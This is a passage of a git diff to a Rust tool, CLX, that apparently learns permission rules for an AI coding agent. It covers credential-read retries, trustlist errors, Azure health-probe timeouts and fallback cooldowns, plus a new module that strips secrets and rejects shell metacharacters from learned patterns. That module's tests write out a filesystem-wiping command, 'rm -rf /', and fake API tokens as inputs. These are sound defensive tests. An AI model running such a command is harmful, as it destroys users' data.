                 self.entries.remove(matches[0]);
                 Ok(true)
             }
-            n => bail!("hash prefix '{needle}' is ambiguous ({n} matches); supply more characters"),
+            n => Err(Error::Trust(TrustError::InvalidHashPrefix(format!(
+                "hash prefix '{needle}' is ambiguous ({n} matches); supply more characters"
+            )))),
         }
     }
 
diff --git a/crates/clx-core/src/credentials/backend.rs b/crates/clx-core/src/credentials/backend.rs
index bf7e74d..74afce8 100644
--- a/crates/clx-core/src/credentials/backend.rs
+++ b/crates/clx-core/src/credentials/backend.rs
@@ -100,6 +100,19 @@ const LOCK_TIMEOUT: Duration = Duration::from_secs(10);
 /// Poll interval while waiting on a contended advisory lock.
 const LOCK_POLL_INTERVAL: Duration = Duration::from_millis(25);
 
+/// Number of times the READ path retries a transient zero-byte
+/// `credentials.age` before surfacing a hard corruption error (FIX-8).
+///
+/// A zero-byte file is the brief window an external truncation (or a crash
+/// mid-write) leaves before a valid blob reappears. The lock-free read path
+/// can observe that window and would otherwise hard-error on the LLM-auth
+/// path. A few short retries ride out the transient window without weakening
+/// the WRITE path, which still fail-closes on zero bytes (never overwrites).
+const READ_ZERO_BYTE_RETRIES: u32 = 3;
+
+/// Delay between zero-byte read retries.
+const READ_ZERO_BYTE_RETRY_DELAY: Duration = Duration::from_millis(20);
+
 /// RAII guard holding the cross-process advisory exclusive lock. The lock is
 /// released when the underlying file handle is dropped (and, as a hard
 /// guarantee, on process death: advisory `flock`/`fcntl` locks are released
@@ -265,16 +278,7 @@ impl AgeFileBackend {
             Err(e) => return Err(Self::map_err("read credentials.age", e)),
         };
         if encrypted.is_empty() {
-            return Err(CredentialError::Storage(format!(
-                "credentials store is corrupt: {} exists but is zero bytes \
-                 (a crash or external truncate during a prior write). CLX will \
-                 NOT overwrite it, to avoid destroying credentials that may \
-                 have existed. To recover, delete the empty file deliberately \
-                 (`rm {}`) and re-run `clx credentials set <key> <value>` (or \
-                 `clx credentials migrate`) to repopulate it.",
-                self.cred_file.display(),
-                self.cred_file.display(),
-            )));
+            return Err(self.zero_byte_corruption_error());
         }
         let decryptor = age::Decryptor::new(&encrypted[..])
             .map_err(|e| Self::map_err("init age decryptor (corrupt credentials.age?)", e))?;
@@ -289,6 +293,52 @@ impl AgeFileBackend {
             .map_err(|e| Self::map_err("parse decrypted credentials json", e))
     }
 
+    /// The hard, actionable error surfaced when `credentials.age` exists but is
+    /// zero bytes. Centralised so the read-retry path (FIX-8) and the
+    /// write/`with_map` path share one message and the WRITE path keeps its
+    /// never-overwrite guarantee.
+    fn zero_byte_corruption_error(&self) -> CredentialError {
+        CredentialError::Storage(format!(
+            "credentials store is corrupt: {} exists but is zero bytes \
+             (a crash or external truncate during a prior write). CLX will \
+             NOT overwrite it, to avoid destroying credentials that may \
+             have existed. To recover, delete the empty file deliberately \
+             (`rm {}`) and re-run `clx credentials set <key> <value>` (or \
+             `clx credentials migrate`) to repopulate it.",
+            self.cred_file.display(),
+            self.cred_file.display(),
+        ))
+    }
+
+    /// Read-path map loader with a short bounded retry on a *transient*
+    /// zero-byte file (FIX-8).
+    ///
+    /// The lock-free `get`/`list_keys` paths can momentarily observe the brief
+    /// window where an external truncation has emptied `credentials.age` before
+    /// a valid blob reappears. Rather than hard-error on the LLM-auth path, we
+    /// retry the read a few times. A *persistently* zero-byte file still
+    /// surfaces the same corruption error as before — so a real truncation is
+    /// not masked, and the WRITE path's fail-closed no-overwrite behaviour is
+    /// untouched (writes never call this).
+    fn load_map_read(&self, identity: &age::x25519::Identity) -> Result<BTreeMap<String, String>> {
+        let mut attempt = 0u32;
+        loop {
+            // Distinguish a zero-byte file (retryable) from any other error
+            // (NotFound -> empty map, decode errors -> hard error). We only
+            // retry when the file is present AND empty.
+            let is_zero_byte = matches!(
+                fs::metadata(&self.cred_file),
+                Ok(meta) if meta.len() == 0
+            );
+            if is_zero_byte && attempt < READ_ZERO_BYTE_RETRIES {
+                attempt += 1;
+                std::thread::sleep(READ_ZERO_BYTE_RETRY_DELAY);
+                continue;
+            }
+            return self.load_map(identity);
+        }
+    }
+
     /// Encrypt+atomically persist the map (temp file + rename).
     fn store_map(
         &self,
@@ -398,7 +448,7 @@ impl AgeFileBackend {
 impl CredentialBackend for AgeFileBackend {
     fn get(&self, scoped_key: &str) -> Result<Option<String>> {
         let identity = self.load_identity()?;
-        Ok(self.load_map(&identity)?.get(scoped_key).cloned())
+        Ok(self.load_map_read(&identity)?.get(scoped_key).cloned())
     }
 
     fn set(&self, scoped_key: &str, value: &str) -> Result<()> {
@@ -419,7 +469,7 @@ impl CredentialBackend for AgeFileBackend {
 
     fn list_keys(&self) -> Result<Vec<String>> {
         let identity = self.load_identity()?;
-        Ok(self.load_map(&identity)?.into_keys().collect())
+        Ok(self.load_map_read(&identity)?.into_keys().collect())
     }
 
     fn label(&self) -> &'static str {
diff --git a/crates/clx-core/src/error.rs b/crates/clx-core/src/error.rs
index fcefb48..62107ab 100644
--- a/crates/clx-core/src/error.rs
+++ b/crates/clx-core/src/error.rs
@@ -3,7 +3,6 @@
 use thiserror::Error;
 
 use crate::credentials::CredentialError;
-use crate::llm::OllamaError;
 
 /// Main error type for CLX operations
 #[non_exhaustive]
@@ -13,6 +12,14 @@ pub enum Error {
     #[error("Configuration error: {0}")]
     Config(String),
 
+    /// Config-trustlist error (malformed, unsupported version, or IO).
+    ///
+    /// Distinct from [`Error::Config`] so callers can tell a trustlist
+    /// failure apart from a general configuration problem. The wrapped
+    /// [`TrustError`] preserves the malformed-vs-version-vs-IO distinction.
+    #[error("Trustlist error: {0}")]
+    Trust(#[from] TrustError),
+
     /// Storage/database error
     #[error("Storage error: {0}")]
     Storage(#[from] rusqlite::Error),
@@ -29,10 +36,6 @@ pub enum Error {
     #[error("IO error: {0}")]
     Io(#[from] std::io::Error),
 
-    /// Policy violation
-    #[error("Policy violation: {0}")]
-    PolicyViolation(String),
-
     /// Context not found
     #[error("Context not found: {0}")]
     ContextNotFound(String),
@@ -41,10 +44,6 @@ pub enum Error {
     #[error("Invalid input: {0}")]
     InvalidInput(String),
 
-    /// Ollama LLM service error
-    #[error("Ollama error: {0}")]
-    Ollama(#[from] OllamaError),
-
     /// Credential/keychain error
     #[error("Credential error: {0}")]
     Credential(#[from] CredentialError),
@@ -54,5 +53,56 @@ pub enum Error {
     Http(#[from] reqwest::Error),
 }
 
+/// Errors from the per-project config trustlist loader
+/// ([`crate::config::trust`]).
+///
+/// The variants preserve the fail-loud semantics of the original
+/// `anyhow`-based loader while letting callers distinguish a malformed
+/// file from an unsupported schema version from an IO failure. All three
+/// are fail-loud: a trustlist read error must never silently re-trust.
+#[derive(Error, Debug)]
+pub enum TrustError {
+    /// The trustlist file exists but is not valid JSON. Refusing to
+    /// silently reset is itself a security property.
+    #[error("trustlist at {path} is malformed JSON; refusing to silently reset: {source}")]
+    Malformed {
+        /// Path to the offending trustlist file.
+        path: String,
+        /// Underlying JSON parse error.
+        source: serde_json::Error,
+    },
+
+    /// The trustlist declares a schema version this build does not support.
+    #[error(
+        "trustlist at {path} has unsupported version {found} (expected {expected}); \
+         re-run `clx config-trust add` to upgrade"
+    )]
+    UnsupportedVersion {
+        /// Path to the trustlist file.
+        path: String,
+        /// Version found on disk.
+        found: u32,
+        /// Version this build supports.
+        expected: u32,
+    },
+
+    /// An IO error occurred while reading or writing the trustlist.
+    #[error("trustlist IO error at {path}: {source}")]
+    Io {
+        /// Path to the trustlist file.
+        path: String,
+        /// Underlying IO error.
+        source: std::io::Error,
+    },
+
+    /// A serialization error occurred while persisting the trustlist.
+    #[error("failed to serialize trustlist: {0}")]
+    Serialize(serde_json::Error),
+
+    /// A supplied hash prefix was invalid (empty or ambiguous).
+    #[error("{0}")]
+    InvalidHashPrefix(String),
+}
+
 /// Result type alias using CLX Error
 pub type Result<T> = std::result::Result<T, Error>;
diff --git a/crates/clx-core/src/learned_pattern.rs b/crates/clx-core/src/learned_pattern.rs
new file mode 100644
index 0000000..9f9a921
--- /dev/null
+++ b/crates/clx-core/src/learned_pattern.rs
@@ -0,0 +1,257 @@
+//! Pure detectors for the learned-rules pipeline (Issue 1).
+//!
+//! These functions decide whether a candidate learned pattern (or the raw
+//! command it is derived from) is safe to persist into the `learned_rules`
+//! table. They are deliberately pure and infallible so the same logic can be
+//! reused by both the `clx-hook` learning path and the `clx-core` v9 migration
+//! purge.
+//!
+//! Three primitives are provided:
+//! - [`strip_env_assignments`] removes a leading `ENV=VALUE` run (quote-aware)
+//!   so the secret-bearing value never reaches a stored pattern.
+//! - [`pattern_contains_secret`] flags patterns that trip the shared secret
+//!   redactor or a high-entropy fallback.
+//! - [`is_well_formed_pattern`] gates the `Tool(body)` shape, rejecting shell
+//!   metacharacters while deliberately allowing `*` (wildcards) and `/` (paths).
+
+/// Strip a leading run of `ENV=VALUE` assignments from `cmd`, returning the
+/// remainder of the *original* string (leading whitespace trimmed).
+///
+/// The scan is quote-aware: an assignment value may be unquoted, single-quoted,
+/// or double-quoted and may contain spaces inside the quotes
+/// (e.g. `SSHPASS='p w'`). Scanning stops at the first whitespace-separated
+/// token that is not a valid assignment; the slice from that token onward is
+/// returned. If every token is an assignment, `""` is returned.
+///
+/// A valid leading assignment token starts with an identifier matching
+/// `^[A-Za-z_][A-Za-z0-9_]*` immediately followed by `=`. Tokens such as
+/// `./path=x` are not assignments and leave the command unchanged.
+#[must_use]
+pub fn strip_env_assignments(cmd: &str) -> &str {
+    let mut rest = cmd;
+    loop {
+        // Skip leading whitespace, remembering where the next token begins.
+        let token_start_offset = rest.len() - rest.trim_start().len();
+        let after_ws = &rest[token_start_offset..];
+        if after_ws.is_empty() {
+            // Only whitespace remained after a run of assignments.
+            return after_ws;
+        }
+
+        match assignment_token_len(after_ws) {
+            Some(len) => {
+                // Advance past this assignment token; keep scanning for more.
+                rest = &after_ws[len..];
+            }
+            None => {
+                // First non-assignment token: this is the real command start.
+                return after_ws;
+            }
+        }
+    }
+}
+
+/// If `s` begins with a valid `IDENT=...` assignment token, return the byte
+/// length of that token (including any quoted value, up to the next unquoted
+/// whitespace). Otherwise return `None`.
+fn assignment_token_len(s: &str) -> Option<usize> {
+    let bytes = s.as_bytes();
+
+    // Identifier: ^[A-Za-z_][A-Za-z0-9_]*
+    let first = *bytes.first()?;
+    if !(first.is_ascii_alphabetic() || first == b'_') {
+        return None;
+    }
+    let mut i = 1;
+    while i < bytes.len() && (bytes[i].is_ascii_alphanumeric() || bytes[i] == b'_') {
+        i += 1;
+    }
+
+    // Must be immediately followed by '='.
+    if bytes.get(i) != Some(&b'=') {
+        return None;
+    }
+    i += 1; // consume '='
+
+    // Consume the value, honoring single/double quotes (which may hold spaces).
+    let mut quote: Option<u8> = None;
+    while i < bytes.len() {
+        let c = bytes[i];
+        match quote {
+            Some(q) => {
+                if c == q {
+                    quote = None;
+                }
+            }
+            None => {
+                if c == b'\'' || c == b'"' {
+                    quote = Some(c);
+                } else if c.is_ascii_whitespace() {
+                    break;
+                }
+            }
+        }
+        i += 1;
+    }
+
+    Some(i)
+}
+
+/// Minimum token length (in chars) for the high-entropy secret fallback.
+const ENTROPY_MIN_LEN: usize = 20;
+
+/// Minimum Shannon entropy (bits/char) for the high-entropy secret fallback.
+const ENTROPY_MIN_BITS_PER_CHAR: f64 = 3.5;
+
+/// Return `true` if `p` appears to contain a secret.
+///
+/// A pattern is considered secret-bearing when either:
+/// - the shared [`crate::redaction::redact_secrets`] redactor changes it
+///   (a known prefix/keyword secret shape), or
+/// - it contains a whitespace-separated token of length `>= 20` whose Shannon
+///   entropy is `>= 3.5` bits/char (a high-entropy fallback for opaque tokens
+///   the keyword redactor does not recognize).
+#[must_use]
+pub fn pattern_contains_secret(p: &str) -> bool {
+    if crate::redaction::redact_secrets(p) != p {
+        return true;
+    }
+    p.split_whitespace().any(is_high_entropy_token)
+}
+
+/// High-entropy fallback: a long token whose per-char Shannon entropy is high
+/// enough to look like an opaque credential rather than English/code.
+fn is_high_entropy_token(token: &str) -> bool {
+    if token.chars().count() < ENTROPY_MIN_LEN {
+        return false;
+    }
+    shannon_entropy_bits_per_char(token) >= ENTROPY_MIN_BITS_PER_CHAR
+}
+
+/// Compute the Shannon entropy of `s` in bits per character.
+fn shannon_entropy_bits_per_char(s: &str) -> f64 {
+    let mut counts: std::collections::HashMap<char, usize> = std::collections::HashMap::new();
+    let mut total = 0usize;
+    for c in s.chars() {
+        *counts.entry(c).or_insert(0) += 1;
+        total += 1;
+    }
+    if total == 0 {
+        return 0.0;
+    }
+    #[allow(clippy::cast_precision_loss)]
+    let total_f = total as f64;
+    let mut entropy = 0.0;
+    for &count in counts.values() {
+        #[allow(clippy::cast_precision_loss)]
+        let p = count as f64 / total_f;
+        entropy -= p * p.log2();
+    }
+    entropy
+}
+
+/// Shell metacharacter sequences that make a pattern body malformed/over-broad.
+///
+/// Mirrors the reject-set used by `clx-hook`'s `is_pattern_too_broad`, with the
+/// deliberate exception that `*` and `/` are NOT rejected here: legitimate
+/// learned patterns use `*` for wildcards and `/` for paths.
+const METACHAR_SEQUENCES: &[&str] = &[";", "&&", "||", "|", "$(", "`", "<(", ">(", ">>", ">"];
+
+/// Return `true` if `p` is a well-formed `Tool(body)` pattern.
+///
+/// Requirements:
+/// - There is a `(` and the last character is `)`.
+/// - The tool segment (everything before the first `(`) matches
+///   `^[A-Za-z0-9._-]+$`.
+/// - The body (between the first `(` and the last `)`) contains none of the
+///   shell metacharacters in [`METACHAR_SEQUENCES`].
+///
+/// `*` and `/` are explicitly allowed in the body so that legitimate wildcard
+/// and path patterns (e.g. `FileEdit(*/x/*)`, `Bash(npm run build*)`) pass.
+#[must_use]
+pub fn is_well_formed_pattern(p: &str) -> bool {
+    // Last char must be ')'.
+    if !p.ends_with(')') {
+        return false;
+    }
+    // There must be an opening '(' before the trailing ')'.
+    let Some(open) = p.find('(') else {
+        return false;
+    };
+    // The closing ')' we trust is the last char; its index:
+    let close = p.len() - 1;
+    if open >= close {
+        return false;
+    }
+
+    let tool = &p[..open];
+    if tool.is_empty() || !tool.bytes().all(is_tool_segment_byte) {
+        return false;
+    }
+
+    let body = &p[open + 1..close];
+    !METACHAR_SEQUENCES.iter().any(|m| body.contains(m))
+}
+
+/// Allowed bytes in a tool segment: `[A-Za-z0-9._-]`.
+fn is_tool_segment_byte(b: u8) -> bool {
+    b.is_ascii_alphanumeric() || b == b'.' || b == b'_' || b == b'-'
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use rstest::rstest;
+
+    #[rstest]
+    #[case("SSHPASS='p w' ssh host", "ssh host")]
+    #[case("FOO=bar rm -rf /", "rm -rf /")]
+    #[case("ls -la", "ls -la")]
+    #[case("A=1 B=2 cmd", "cmd")]
+    #[case("./path=x", "./path=x")]
+    #[case("A=1", "")]
+    #[case("VAR='a b' cmd arg", "cmd arg")]
+    #[case("VAR=\"a b\" cmd", "cmd")]
+    #[case("  FOO=bar baz", "baz")]
+    #[case("", "")]
+    fn strip_env_assignments_cases(#[case] input: &str, #[case] expected: &str) {
+        assert_eq!(strip_env_assignments(input), expected);
+    }
+
+    #[rstest]
+    // Secret-bearing: bearer token, sk- key, long high-entropy token.
+    #[case("Authorization: Bearer abcdefghijklmnopqrstuvwxyz0123456789", true)]
+    #[case("Bash(curl -H 'token: sk-ABCDEFGHIJKLMNOPQRSTUVWXYZ012345')", true)]
+    #[case("deploy aGVsbG93b3JsZHNlY3JldHRva2VuMTIzNDU2Nzg5", true)]
+    // Not secrets: ordinary patterns and benign keyword-first wildcards.
+    #[case("Bash(ls:*)", false)]
+    #[case("Bash(git:diff*)", false)]
+    #[case("Bash(make build)", false)]
+    #[case("ls -la", false)]
+    fn pattern_contains_secret_cases(#[case] input: &str, #[case] expected: bool) {
+        assert_eq!(pattern_contains_secret(input), expected);
+    }
+
+    #[rstest]
+    // Well-formed: '*' and '/' must be allowed.
+    #[case("Bash(make build)", true)]
+    #[case("Bash(npm run build:prod)", true)]
+    #[case("FileEdit(*/x/*)", true)]
+    #[case("Bash(npm run build*)", true)]
+    #[case("Bash(ls:*)", true)]
+    #[case("Bash(git:diff*)", true)]
+    // Malformed: metachars / missing parens.
+    #[case("Bash(a; b)", false)]
+    #[case("Bash(x > y)", false)]
+    #[case("Bash($(x))", false)]
+    #[case("Bad pattern no parens", false)]
+    #[case("Bash(a && b)", false)]
+    #[case("Bash(a || b)", false)]
+    #[case("Bash(a | b)", false)]
+    #[case("Bash(a >> b)", false)]
+    #[case("Bash(`x`)", false)]
+    #[case("Bash(<(x))", false)]
+    fn is_well_formed_pattern_cases(#[case] input: &str, #[case] expected: bool) {
+        assert_eq!(is_well_formed_pattern(input), expected);
+    }
+}
diff --git a/crates/clx-core/src/lib.rs b/crates/clx-core/src/lib.rs
index 4553a7a..66fc4ee 100644
--- a/crates/clx-core/src/lib.rs
+++ b/crates/clx-core/src/lib.rs
@@ -11,6 +11,7 @@ pub mod config;
 pub mod credentials;
 pub mod embeddings;
 pub mod error;
+pub mod learned_pattern;
 pub mod llm;
 pub mod llm_health;
 pub mod paths;
diff --git a/crates/clx-core/src/llm/azure.rs b/crates/clx-core/src/llm/azure.rs
index 62baec9..794b4d7 100644
--- a/crates/clx-core/src/llm/azure.rs
+++ b/crates/clx-core/src/llm/azure.rs
@@ -24,6 +24,15 @@ use url::Url;
 /// embedded, so even within the cap any recognised secret pattern is scrubbed.
 const MAX_BODY_EXCERPT_BYTES: usize = 80;
 
+/// Per-request timeout for the `is_available` health probe (2 seconds).
+///
+/// Mirrors Ollama's `HEALTH_CHECK_TIMEOUT_MS`. Without a dedicated per-request
+/// timeout the probe inherits the chat client timeout (default 30s), so an
+/// unreachable/slow endpoint would stall the health check far beyond its
+/// budget. A slow-but-alive Azure may report unavailable under this budget,
+/// which is the safe direction (falls back).
+const HEALTH_CHECK_TIMEOUT_MS: u64 = 2_000;
+
 /// Build a bounded, structured, redacted error summary from a raw HTTP
 /// response body and the Azure `x-request-id` header value (B6-1 fix).
 ///
@@ -65,6 +74,10 @@ fn truncate_utf8(s: &str, max_bytes: usize) -> &str {
     &s[..end]
 }
 
+/// Default embedding dimension requested when no config-derived dimension is
+/// supplied (matches CLX's historical hardcoded value).
+const DEFAULT_EMBEDDING_DIMENSION: u32 = 1024;
+
 #[derive(Debug, Clone)]
 pub struct AzureOpenAIBackend {
     endpoint: Url,
@@ -72,12 +85,33 @@ pub struct AzureOpenAIBackend {
     api_version: Option<String>,
     retry: RetryConfig,
     http: reqwest::Client,
+    /// Output dimension requested on the `embeddings` call via the `OpenAI`
+    /// `dimensions` parameter. Resolved from config at construction (route
+    /// override → model registry → legacy ollama dim → default 1024).
+    embedding_dimension: u32,
 }
 
 const ALLOWED_HOST_SUFFIXES: &[&str] = &[".openai.azure.com", ".azure-api.net"];
 
 impl AzureOpenAIBackend {
+    /// Construct a backend using the default embedding dimension (1024).
+    ///
+    /// Prefer [`AzureOpenAIBackend::with_embedding_dimension`] when a
+    /// config-derived dimension is available.
     pub fn new(cfg: &AzureOpenAIConfig, api_key: SecretString) -> Result<Self, LlmError> {
+        Self::with_embedding_dimension(cfg, api_key, DEFAULT_EMBEDDING_DIMENSION)
+    }
+
+    /// Construct a backend with an explicit embedding output dimension.
+    ///
+    /// The dimension is sent as the `OpenAI` `dimensions` parameter on every
+    /// `embed` request, so all rows produced by this backend share a single
+    /// stored dimension.
+    pub fn with_embedding_dimension(
+        cfg: &AzureOpenAIConfig,
+        api_key: SecretString,
+        embedding_dimension: u32,
+    ) -> Result<Self, LlmError> {
         let endpoint = Url::parse(&cfg.endpoint)
             .map_err(|e| LlmError::Connection(format!("invalid endpoint URL: {e}")))?;
         Self::validate_host(&endpoint)?;
@@ -93,6 +127,7 @@ impl AzureOpenAIBackend {
             api_version: cfg.api_version.clone().filter(|s| !s.is_empty()),
             retry: cfg.retry,
             http,
+            embedding_dimension,
         })
     }
 
@@ -359,7 +394,7 @@ impl LocalLlmBackend for AzureOpenAIBackend {
         let body = EmbedRequest {
             model: deployment,
             input: text,
-            dimensions: Some(1024),
+            dimensions: Some(self.embedding_dimension),
         };
         let resp = with_backoff(
             self.retry,
@@ -381,6 +416,7 @@ impl LocalLlmBackend for AzureOpenAIBackend {
             .http
             .get(url)
             .header("api-key", self.api_key.expose_secret())
+            .timeout(Duration::from_millis(HEALTH_CHECK_TIMEOUT_MS))
             .send()
             .await;
         matches!(resp, Ok(r) if r.status().is_success())
@@ -449,8 +485,15 @@ mod tests {
     async fn embed_happy_path() {
         allow_local();
         let mock = MockServer::start().await;
+        // AC6.4: assert the request body carries the configured `dimensions`.
+        // The backend is constructed with the default dimension (1024), so the
+        // request body must send `dimensions: 1024` and the mock response is
+        // consistent with that.
         Mock::given(matchers::method("POST"))
             .and(matchers::path("/openai/v1/embeddings"))
+            .and(matchers::body_partial_json(
+                serde_json::json!({ "dimensions": 1024 }),
+            ))
             .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
                 "data": [{ "embedding": vec![0.1f32; 1024] }]
             })))
@@ -468,6 +511,38 @@ mod tests {
         assert_eq!(v.len(), 1024);
     }
 
+    /// AC6.4: the configured embedding dimension is sent verbatim in the request
+    /// body. A backend built with `with_embedding_dimension(3072)` must request
+    /// `dimensions: 3072` — the mock only matches that body, so a regression to
+    /// the old hardcoded 1024 would fail to match and the request would 404/hang.
+    #[tokio::test]
+    #[serial(env_azure_hosts)]
+    async fn embed_sends_configured_dimension() {
+        allow_local();
+        let mock = MockServer::start().await;
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/embeddings"))
+            .and(matchers::body_partial_json(
+                serde_json::json!({ "dimensions": 3072 }),
+            ))
+            .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
+                "data": [{ "embedding": vec![0.2f32; 3072] }]
+            })))
+            .mount(&mock)
+            .await;
+        let backend = AzureOpenAIBackend::with_embedding_dimension(
+            &cfg(mock.uri()),
+            SecretString::new("test-key".to_string().into()),
+            3072,
+        )
+        .unwrap();
+        let v = backend
+            .embed("text", Some("text-embedding-3-large"))
+            .await
+            .unwrap();
+        assert_eq!(v.len(), 3072, "response dimension must match configured");
+    }
+
     #[tokio::test]
     #[serial(env_azure_hosts)]
     async fn host_outside_allowlist_rejected() {
@@ -610,6 +685,44 @@ mod tests {
         assert!(!backend.is_available().await);
     }
 
+    /// FIX-5 regression — the health probe must use a SHORT dedicated
+    /// per-request timeout (`HEALTH_CHECK_TIMEOUT_MS`), not inherit the chat
+    /// client timeout. A `/models` endpoint that delays well beyond the probe
+    /// budget must yield `false` within ~the budget. Before the fix the probe
+    /// had no `.timeout(...)`, so it would block on the much larger client
+    /// timeout and this test would exceed its own wall-clock guard.
+    #[tokio::test]
+    #[serial(env_azure_hosts)]
+    async fn is_available_false_when_probe_exceeds_budget() {
+        allow_local();
+        let mock = MockServer::start().await;
+        // Delay far beyond HEALTH_CHECK_TIMEOUT_MS (2s) but well under the
+        // chat client timeout (5s in `cfg`); a regression (no per-request
+        // timeout) would wait the full client timeout instead.
+        Mock::given(matchers::method("GET"))
+            .and(matchers::path("/openai/v1/models"))
+            .respond_with(
+                ResponseTemplate::new(200)
+                    .set_delay(Duration::from_millis(4_500))
+                    .set_body_json(serde_json::json!({"data":[]})),
+            )
+            .mount(&mock)
+            .await;
+        let backend =
+            AzureOpenAIBackend::new(&cfg(mock.uri()), SecretString::new("k".to_string().into()))
+                .unwrap();
+        let start = std::time::Instant::now();
+        let available = backend.is_available().await;
+        let elapsed = start.elapsed();
+        assert!(!available, "slow probe must report unavailable");
+        // Generous upper bound: well below the 4.5s delay / chat timeout, but
+        // above the 2s budget plus scheduling slack.
+        assert!(
+            elapsed < Duration::from_millis(3_500),
+            "probe should bail at ~{HEALTH_CHECK_TIMEOUT_MS}ms, took {elapsed:?}"
+        );
+    }
+
     /// TC-AZ-013 — Dated URL shape: when `api_version` is set, URL builders
     /// switch to `/openai/deployments/<deployment>/...?api-version=<v>`.
     /// Default (None) uses the v1 path. Pure URL-construction assertion;
diff --git a/crates/clx-core/src/llm/fallback.rs b/crates/clx-core/src/llm/fallback.rs
index 800ef0b..c3ff285 100644
--- a/crates/clx-core/src/llm/fallback.rs
+++ b/crates/clx-core/src/llm/fallback.rs
@@ -1,14 +1,22 @@
 //! Primary→secondary LLM provider fallback wrapper.
 //!
 //! Wraps two `LlmClient` instances. On a transient error from the primary,
-//! falls back to the secondary. After a fallback event, a 30-second
-//! in-process cooldown skips the primary entirely so a sustained outage
-//! does not pay the latency penalty of always hitting the dead primary first.
+//! falls back to the secondary. After a fallback event, a 30-second cooldown
+//! skips the primary entirely so a sustained outage does not pay the latency
+//! penalty of always hitting the dead primary first.
+//!
+//! The cooldown is enforced at two scopes (FIX-7):
+//! 1. an in-process `Mutex<Option<Instant>>` fast path, and
+//! 2. a cross-process file marker in [`crate::llm_health`], so that a recent
+//!    primary failure recorded by a *prior* hook process (CLX runs
+//!    one-process-per-event) still short-circuits to the fallback.
 
+use std::path::PathBuf;
 use std::sync::Mutex;
 use std::time::{Duration, Instant};
 
 use crate::llm::{LlmClient, LlmError, LocalLlmBackend};
+use crate::llm_health;
 
 /// Sticky-fallback duration after a primary failure.
 const COOLDOWN: Duration = Duration::from_secs(30);
@@ -22,8 +30,11 @@ pub struct FallbackClient {
     /// (e.g. `gpt-5.4-mini` only exists on Azure).
     fallback_model: Option<String>,
     /// `Some(t)` means primary failed at instant `t`; skip primary until
-    /// `t.elapsed() >= COOLDOWN`.
+    /// `t.elapsed() >= COOLDOWN`. In-process fast path.
     last_primary_failure: Mutex<Option<Instant>>,
+    /// Optional override for the cross-process marker's base directory. `None`
+    /// uses the real CLX data dir; tests point this at a temp dir.
+    health_base: Option<PathBuf>,
 }
 
 impl FallbackClient {
@@ -34,25 +45,61 @@ impl FallbackClient {
             fallback: Box::new(fallback),
             fallback_model,
             last_primary_failure: Mutex::new(None),
+            health_base: None,
         }
     }
 
-    fn use_fallback_directly(&self) -> bool {
-        match *self
-            .last_primary_failure
-            .lock()
-            .expect("poisoned cooldown lock")
-        {
-            Some(t) => t.elapsed() < COOLDOWN,
-            None => false,
+    /// Test-only constructor that routes the cross-process failure marker
+    /// through `base` instead of the real CLX data dir.
+    #[cfg(test)]
+    fn new_with_health_base(
+        primary: LlmClient,
+        fallback: LlmClient,
+        fallback_model: Option<String>,
+        base: PathBuf,
+    ) -> Self {
+        Self {
+            primary: Box::new(primary),
+            fallback: Box::new(fallback),
+            fallback_model,
+            last_primary_failure: Mutex::new(None),
+            health_base: Some(base),
         }
     }
 
+    /// Cross-process check: did a prior (or this) process record a primary
+    /// failure within the cooldown window? Bounded, non-blocking file read.
+    fn cross_process_failure_active(&self) -> bool {
+        match &self.health_base {
+            Some(base) => llm_health::primary_failure_active_in(base, COOLDOWN),
+            None => llm_health::primary_failure_active(COOLDOWN),
+        }
+    }
+
+    fn use_fallback_directly(&self) -> bool {
+        // Fast path: in-process cooldown.
+        let in_process_active = matches!(
+            *self
+                .last_primary_failure
+                .lock()
+                .expect("poisoned cooldown lock"),
+            Some(t) if t.elapsed() < COOLDOWN
+        );
+        // Cross-process path: a prior hook process may have recorded a failure.
+        in_process_active || self.cross_process_failure_active()
+    }
+
     fn record_primary_failure(&self) {
         *self
             .last_primary_failure
             .lock()
             .expect("poisoned cooldown lock") = Some(Instant::now());
+        // Seed the cross-process marker so the next per-event process skips
+        // the dead primary too. Best-effort; never blocks the LLM path.
+        match &self.health_base {
+            Some(base) => llm_health::record_primary_failure_in(base),
+            None => llm_health::record_primary_failure(),
+        }
     }
 
     fn fb_model<'a>(&'a self, caller: Option<&'a str>) -> Option<&'a str> {
@@ -110,7 +157,14 @@ impl LocalLlmBackend for FallbackClient {
     }
 
     async fn is_available(&self) -> bool {
-        // Either backend healthy means "fallback path is alive."
+        // Either backend healthy means "fallback path is alive." When the
+        // cross-process cooldown is active (a recent primary failure), probe the
+        // fallback FIRST so a one-shot hook process does not pay the dead
+        // primary's probe latency before checking the live fallback.
+        if self.use_fallback_directly() {
+            return Box::pin(self.fallback.is_available()).await
+                || Box::pin(self.primary.is_available()).await;
+        }
         Box::pin(self.primary.is_available()).await || Box::pin(self.fallback.is_available()).await
     }
 }
@@ -153,8 +207,29 @@ mod tests {
         LlmClient::Azure(backend)
     }
 
+    /// Counter for unique isolated health-cache base dirs across tests.
+    static FC_BASE_SEQ: std::sync::atomic::AtomicU64 = std::sync::atomic::AtomicU64::new(0);
+
+    /// Build a `FallbackClient` whose cross-process failure marker lives in a
+    /// fresh, unique temp dir, so no test touches the real CLX data dir or
+    /// observes another test's marker.
+    fn fc_isolated(
+        primary: LlmClient,
+        fallback: LlmClient,
+        fallback_model: Option<String>,
+    ) -> FallbackClient {
+        let n = FC_BASE_SEQ.fetch_add(1, std::sync::atomic::Ordering::Relaxed);
+        let base = std::env::temp_dir().join(format!(
+            "clx-fallback-iso-{}-{:?}-{n}",
+            std::process::id(),
+            std::thread::current().id()
+        ));
+        let _ = std::fs::create_dir_all(&base);
+        FallbackClient::new_with_health_base(primary, fallback, fallback_model, base)
+    }
+
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn fallback_on_primary_503_succeeds() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -176,7 +251,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(
+        let fc = fc_isolated(
             azure(primary_mock.uri()),
             azure(fallback_mock.uri()),
             Some("fallback-model".into()),
@@ -187,7 +262,7 @@ mod tests {
     }
 
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn fallback_not_used_on_terminal_error() {
         allow_local();
